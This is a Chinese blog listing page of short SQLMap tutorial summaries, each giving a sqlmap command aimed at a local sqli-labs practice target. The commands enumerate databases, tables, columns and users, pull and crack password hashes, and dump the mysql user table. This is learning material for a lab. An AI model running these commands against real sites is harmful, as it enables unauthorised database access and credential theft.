上一页 1 ··· 5 6 7 8 9 10 11 12 13 14 下一页
摘要: 1、--level 5:探测等级 —level 5参数代表需要执行的测试等级为5,一共有5个测试等级1~5,可不加level,不加等级参数默认是1。SQLMap使用的Payload可以在xml/poyloads.xml中看到,也可根据相应的格式添加自己的Payload,使用测试等级5会使用更多的pa 阅读全文
posted @ 2022-10-06 12:38 y夏末y 阅读(712) 评论(0) 推荐(0) 编辑
摘要: 列出当前网站使用的数据库用户 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user 阅读全文
posted @ 2022-10-02 21:23 y夏末y 阅读(44) 评论(0) 推荐(0) 编辑
摘要: 列出当前网站使用的数据库 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db 阅读全文
posted @ 2022-10-02 21:20 y夏末y 阅读(92) 评论(0) 推荐(0) 编辑
摘要: 列出数据库用户的密码 如果当前用户有读取包含用户密码的权限,SQLMap会先列举出用户,然后列出Hash,并尝试破解 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --passwords 阅读全文
posted @ 2022-10-02 21:18 y夏末y 阅读(511) 评论(0) 推荐(0) 编辑
摘要: 列出数据库中的所有用户 在当前用户有权读取包含所有用户的表的权限时,使用该命令列出所有管理用户 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --users 阅读全文
posted @ 2022-10-02 21:14 y夏末y 阅读(87) 评论(0) 推荐(0) 编辑
摘要: 查询完字段名称之后,获取该字段的具体数据信息 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D mysql -T user -C user,password --dump 阅读全文
posted @ 2022-10-02 21:13 y夏末y 阅读(99) 评论(0) 推荐(0) 编辑
摘要: 确定网站存在注入后,用于查询当前用户下的所有数据库 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs 阅读全文
posted @ 2022-10-02 21:10 y夏末y 阅读(108) 评论(0) 推荐(0) 编辑
摘要: 查询表名之后,查询表中的字段名 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D xssplatform -T oc_user --columns 后续注入--columns缩写成-C 阅读全文
posted @ 2022-10-02 20:57 y夏末y 阅读(43) 评论(0) 推荐(0) 编辑
摘要: 查询完数据库后,查询指定数据库中所有的表名 python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D xssplatform --tables 注意:-D大小写 --tables缩写成-T,意思是在某表中继续查询 阅读全文
posted @ 2022-10-02 20:53 y夏末y 阅读(160) 评论(0) 推荐(0) 编辑
摘要: 从文件中加载HTTP请求,SQLMap可以从一个文本文件中获取HTTP请求,这样就可以不设置其他参数(如cookie、POST数据等),txt文件中的内容为Web数据包 文本文件如图(请求数据可以通过Fiddle抓到),红框自己写入: 判断是否存在注入的命令如下: python sqlmap.py 阅读全文
posted @ 2022-10-02 20:44 y夏末y 阅读(190) 评论(0) 推荐(0) 编辑
上一页 1 ··· 5 6 7 8 9 10 11 12 13 14 下一页